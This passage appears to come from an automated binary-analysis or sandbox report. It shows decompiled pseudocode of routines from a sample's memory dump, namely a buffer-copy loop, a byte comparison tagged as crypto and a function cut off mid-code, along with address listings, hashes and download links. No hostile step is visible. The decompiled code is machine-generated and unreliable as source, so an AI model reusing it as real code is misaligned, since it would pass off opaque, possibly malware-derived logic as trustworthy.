													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00C50E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E00C4EA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00C50E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00C447DA(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E00C4EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}










































                                            0x00c46277
                                            0x00c46279
                                            0x00c46287
                                            0x00c4628f
                                            0x00c46293
                                            0x00c46295
                                            0x00c46297
                                            0x00c46297
                                            0x00c4629a
                                            0x00c462a0
                                            0x00c462a1
                                            0x00c462a6
                                            0x00c462b0
                                            0x00c46297
                                            0x00c462bf
                                            0x00c462cf
                                            0x00c462d8
                                            0x00c462df
                                            0x00c462e2
                                            0x00c462e4
                                            0x00c462e8
                                            0x00c462ea
                                            0x00c462ee
                                            0x00c462f2
                                            0x00c462f6
                                            0x00c462f6
                                            0x00c46302
                                            0x00c46308
                                            0x00c46309
                                            0x00c4630e
                                            0x00c46314
                                            0x00000000
                                            0x00000000
                                            0x00c4631a
                                            0x00c4631c
                                            0x00c46320
                                            0x00c46328
                                            0x00000000
                                            0x00c4632e
                                            0x00c46334
                                            0x00000000
                                            0x00c4658a
                                            0x00c4633e
                                            0x00c46340
                                            0x00c46344
                                            0x00c46348
                                            0x00c46348
                                            0x00c4634a
                                            0x00c46350
                                            0x00c46354
                                            0x00c46354
                                            0x00c46356
                                            0x00c46359
                                            0x00c4635b
                                            0x00c4635f
                                            0x00c46366
                                            0x00c46368
                                            0x00c4637b
                                            0x00c46380
                                            0x00c46388
                                            0x00c4638b
                                            0x00c4638b
                                            0x00c4638f
                                            0x00c46392
                                            0x00c46398
                                            0x00c4639e
                                            0x00c463a4
                                            0x00c463a7
                                            0x00c463aa
                                            0x00000000
                                            0x00c463aa
                                            0x00c4636a
                                            0x00c4636a
                                            0x00c463ae
                                            0x00c463ae
                                            0x00c463b3
                                            0x00c463bd
                                            0x00c463c3
                                            0x00c463c7
                                            0x00c463cd
                                            0x00c46400
                                            0x00c46400
                                            0x00c46405
                                            0x00c46416
                                            0x00c46416
                                            0x00c4641d
                                            0x00c46407
                                            0x00c46407
                                            0x00c4640e
                                            0x00000000
                                            0x00c46410
                                            0x00c46410
                                            0x00c46410
                                            0x00c4640e
                                            0x00c46425
                                            0x00c46432
                                            0x00c46434
                                            0x00c46437
                                            0x00c4643b
                                            0x00c4643b
                                            0x00c4643d
                                            0x00c46441
                                            0x00c46449
                                            0x00c46449
                                            0x00c4644e
                                            0x00000000
                                            0x00000000
                                            0x00c46443
                                            0x00c46443
                                            0x00c46447
                                            0x00000000
                                            0x00000000
                                            0x00c46447
                                            0x00c463cf
                                            0x00c463d2
                                            0x00c463d6
                                            0x00c463dc
                                            0x00c463dd
                                            0x00c463e2
                                            0x00c463e4
                                            0x00c4645f
                                            0x00c4645f
                                            0x00c463e6
                                            0x00c463e6
                                            0x00c463ea
                                            0x00c463f5
                                            0x00c463f5
                                            0x00c463f9
                                            0x00000000
                                            0x00c463ec
                                            0x00c463ec
                                            0x00c463f3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c463f3
                                            0x00c463ea
                                            0x00c463e4
                                            0x00c463cd
                                            0x00000000
                                            0x00c46450
                                            0x00c46453
                                            0x00c46455
                                            0x00c46455
                                            0x00c4645d
                                            0x00c46464
                                            0x00c46464
                                            0x00c4646a
                                            0x00c4646f
                                            0x00c46471
                                            0x00c46473
                                            0x00c46475
                                            0x00c46475
                                            0x00c46475
                                            0x00c46476
                                            0x00c46478
                                            0x00c4647a
                                            0x00c4647c
                                            0x00c4647e
                                            0x00c46482
                                            0x00c46482
                                            0x00c46488
                                            0x00c4648c
                                            0x00c46490
                                            0x00c46494
                                            0x00c46496
                                            0x00c46499
                                            0x00c4649b
                                            0x00c4649e
                                            0x00c464a0
                                            0x00c464a2
                                            0x00c464a4
                                            0x00c464a4
                                            0x00c464a6
                                            0x00c464ab
                                            0x00c464ae
                                            0x00c464c3
                                            0x00c464b0
                                            0x00c464b3
                                            0x00c464b3
                                            0x00c464cc
                                            0x00c464ce
                                            0x00c464d2
                                            0x00c464d6
                                            0x00c464d6
                                            0x00c464dc
                                            0x00c464dc
                                            0x00c464e0
                                            0x00c464e4
                                            0x00c464e6
                                            0x00c46641
                                            0x00000000
                                            0x00c464ec
                                            0x00c464ef
                                            0x00c464f6
                                            0x00c464fa
                                            0x00c464fc
                                            0x00c46568
                                            0x00c46568
                                            0x00000000
                                            0x00c464fe
                                            0x00c464fe
                                            0x00c464fe
                                            0x00c46500
                                            0x00c46503
                                            0x00c46505
                                            0x00c4650c
                                            0x00c46527
                                            0x00c4652a
                                            0x00c4652f
                                            0x00c46531
                                            0x00000000
                                            0x00000000
                                            0x00c4650e
                                            0x00c46511
                                            0x00c46516
                                            0x00c46518
                                            0x00c4651e
                                            0x00c46525
                                            0x00c46537
                                            0x00c46537
                                            0x00c4653e
                                            0x00c46544
                                            0x00c4654b
                                            0x00c465a2
                                            0x00c465a7
                                            0x00c465aa
                                            0x00c465ac
                                            0x00c465b2
                                            0x00c465b9
                                            0x00c465bd
                                            0x00c465c5
                                            0x00c465cb
                                            0x00c465ce
                                            0x00c465d2
                                            0x00c465d9
                                            0x00c465dd
                                            0x00c465e4
                                            0x00c465e6
                                            0x00c465e8
                                            0x00c465fe
                                            0x00c46606
                                            0x00c4660f
                                            0x00c46613
                                            0x00c46619
                                            0x00000000
                                            0x00c46619
                                            0x00000000
                                            0x00c465e6
                                            0x00c4654d
                                            0x00c4654d
                                            0x00c46551
                                            0x00c46597
                                            0x00c46599
                                            0x00c4656c
                                            0x00c4656c
                                            0x00c4656e
                                            0x00c46574
                                            0x00c46578
                                            0x00c4657a
                                            0x00c46580
                                            0x00c4662b
                                            0x00c4662d
                                            0x00c4662f
                                            0x00c46623
                                            0x00c46623
                                            0x00c46625
                                            0x00c46645
                                            0x00c46645
                                            0x00c4664a
                                            0x00000000
                                            0x00000000
                                            0x00c46631
                                            0x00c4663a
                                            0x00c46620
                                            0x00c46620
                                            0x00000000
                                            0x00c46620
                                            0x00c4662f
                                            0x00c46586
                                            0x00c46586
                                            0x00000000
                                            0x00c46586
                                            0x00c46580
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46551
                                            0x00c4654b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46525
                                            0x00c46518
                                            0x00000000
                                            0x00c46553
                                            0x00c46557
                                            0x00c4655d
                                            0x00c4655e
                                            0x00c46562
                                            0x00c46562
                                            0x00000000
                                            0x00c46500
                                            0x00c464fc
                                            0x00000000
                                            0x00c464e6
                                            0x00c46592
                                            0x00000000
                                            0x00c46334
                                            0x00c46328
                                            0x00000000
                                            0x00c46320
                                            0x00c46650
                                            0x00c46658
                                            0x00c4665b
                                            0x00c46660
                                            0x00c4666e
                                            0x00c46673
                                            0x00c46681
                                            0x00c4669f

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: feb612fbf08476fdb827ff7e7667616f00b2cfba4672aae2d7944bf8ba7403dd
                                            • Instruction ID: 714fa1f45c267941be95527d6e4c776ac9f4682be6220708d39fdfa17b4230c7
                                            • Opcode Fuzzy Hash: feb612fbf08476fdb827ff7e7667616f00b2cfba4672aae2d7944bf8ba7403dd
                                            • Instruction Fuzzy Hash: DBD128B1A043418FDF14CF28C88179BBBE0BF96308F04056DE8549B64AD374EA59CB9B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4F8C6, Relevance: .3, Instructions: 323COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4F8C6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                            0x00c4f8c6
                                            0x00c4f8c6
                                            0x00c4f8c6
                                            0x00c4f8cc
                                            0x00c4f953
                                            0x00c4f955
                                            0x00c4f957
                                            0x00c4fcd6
                                            0x00c4fcd6
                                            0x00c50ac7
                                            0x00c50ac7
                                            0x00c4f95d
                                            0x00c4f963
                                            0x00c4f9ea
                                            0x00c4f9ec
                                            0x00c4f9ee
                                            0x00000000
                                            0x00000000
                                            0x00c4f9f4
                                            0x00c4f9fa
                                            0x00c4fa81
                                            0x00c4fa83
                                            0x00c4fa85
                                            0x00000000
                                            0x00000000
                                            0x00c4fa8b
                                            0x00c4fa91
                                            0x00c4fb18
                                            0x00c4fb1a
                                            0x00c4fb1c
                                            0x00000000
                                            0x00000000
                                            0x00c4fb28
                                            0x00c4fbb0
                                            0x00c4fbb2
                                            0x00c4fbb4
                                            0x00000000
                                            0x00000000
                                            0x00c4fbba
                                            0x00c4fbc0
                                            0x00c4fc47
                                            0x00c4fc49
                                            0x00c4fc4b
                                            0x00000000
                                            0x00000000
                                            0x00c4fc51
                                            0x00c4fc57
                                            0x00c4fcce
                                            0x00c4fcd0
                                            0x00c4fcd2
                                            0x00c4fcd4
                                            0x00c4fcd4
                                            0x00000000
                                            0x00c4fcd2
                                            0x00c4fc60
                                            0x00c4fc62
                                            0x00c4fc76
                                            0x00c4fc7e
                                            0x00c4fc80
                                            0x00c4fc94
                                            0x00c4fc9c
                                            0x00c4fc9e
                                            0x00c4fcb2
                                            0x00c4fcba
                                            0x00c4fcbc
                                            0x00c4fcc5
                                            0x00c4fcc5
                                            0x00000000
                                            0x00c4fcbc
                                            0x00c4fca7
                                            0x00c4fcb0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fcb0
                                            0x00c4fc89
                                            0x00c4fc92
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fc92
                                            0x00c4fc6b
                                            0x00c4fc74
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fc74
                                            0x00c4fbcd
                                            0x00c4fbcf
                                            0x00c4fbe7
                                            0x00c4fbef
                                            0x00c4fbf1
                                            0x00c4fc09
                                            0x00c4fc11
                                            0x00c4fc13
                                            0x00c4fc2b
                                            0x00c4fc33
                                            0x00c4fc35
                                            0x00c4fc3e
                                            0x00c4fc3e
                                            0x00000000
                                            0x00c4fc35
                                            0x00c4fc1c
                                            0x00c4fc25
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fc25
                                            0x00c4fbfa
                                            0x00c4fc03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fc03
                                            0x00c4fbd8
                                            0x00c4fbe1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fbe1
                                            0x00c4fb36
                                            0x00c4fb38
                                            0x00c4fb50
                                            0x00c4fb58
                                            0x00c4fb5a
                                            0x00c4fb72
                                            0x00c4fb7a
                                            0x00c4fb7c
                                            0x00c4fb94
                                            0x00c4fb9c
                                            0x00c4fb9e
                                            0x00c4fba7
                                            0x00c4fba7
                                            0x00000000
                                            0x00c4fb9e
                                            0x00c4fb85
                                            0x00c4fb8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fb8e
                                            0x00c4fb63
                                            0x00c4fb6c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fb6c
                                            0x00c4fb41
                                            0x00c4fb4a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fb4a
                                            0x00c4fa9e
                                            0x00c4faa0
                                            0x00c4fab8
                                            0x00c4fac0
                                            0x00c4fac2
                                            0x00c4fada
                                            0x00c4fae2
                                            0x00c4fae4
                                            0x00c4fafc
                                            0x00c4fb04
                                            0x00c4fb06
                                            0x00c4fb0f
                                            0x00c4fb0f
                                            0x00000000
                                            0x00c4fb06
                                            0x00c4faed
                                            0x00c4faf6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4faf6
                                            0x00c4facb
                                            0x00c4fad4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fad4
                                            0x00c4faa9
                                            0x00c4fab2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fab2
                                            0x00c4fa07
                                            0x00c4fa09
                                            0x00c4fa21
                                            0x00c4fa29
                                            0x00c4fa2b
                                            0x00c4fa43
                                            0x00c4fa4b
                                            0x00c4fa4d
                                            0x00c4fa65
                                            0x00c4fa6d
                                            0x00c4fa6f
                                            0x00c4fa78
                                            0x00c4fa78
                                            0x00000000
                                            0x00c4fa6f
                                            0x00c4fa56
                                            0x00c4fa5f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fa5f
                                            0x00c4fa34
                                            0x00c4fa3d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fa3d
                                            0x00c4fa12
                                            0x00c4fa1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fa1b
                                            0x00c4f970
                                            0x00c4f972
                                            0x00c4f98a
                                            0x00c4f992
                                            0x00c4f994
                                            0x00c4f9ac
                                            0x00c4f9b4
                                            0x00c4f9b6
                                            0x00c4f9ce
                                            0x00c4f9d6
                                            0x00c4f9d8
                                            0x00c4f9e1
                                            0x00c4f9e1
                                            0x00000000
                                            0x00c4f9d8
                                            0x00c4f9bf
                                            0x00c4f9c8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4f9c8
                                            0x00c4f99d
                                            0x00c4f9a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4f9a6
                                            0x00c4f97b
                                            0x00c4f984
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4f984
                                            0x00c4f8d9
                                            0x00c4f8db
                                            0x00c4f8f3
                                            0x00c4f8fb
                                            0x00c4f8fd
                                            0x00c4f915
                                            0x00c4f91d
                                            0x00c4f91f
                                            0x00c4f937
                                            0x00c4f93f
                                            0x00c4f941
                                            0x00c4f94a
                                            0x00c4f94a
                                            0x00000000
                                            0x00c4f941
                                            0x00c4f928
                                            0x00c4f931
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4f931
                                            0x00c4f906
                                            0x00c4f90f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4f90f
                                            0x00c4f8e4
                                            0x00c4f8ed
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: cfb133989d83bb6862f7401bc39799424028ef8a771dca9e1cd1f10572377061
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: E3C195732051A70ADF2D463AC57413EBBA17AA27B131A177DD8B3CB1C4FE20C666D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3DF12, Relevance: .3, Instructions: 318COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C3DF12(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E00C4EA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
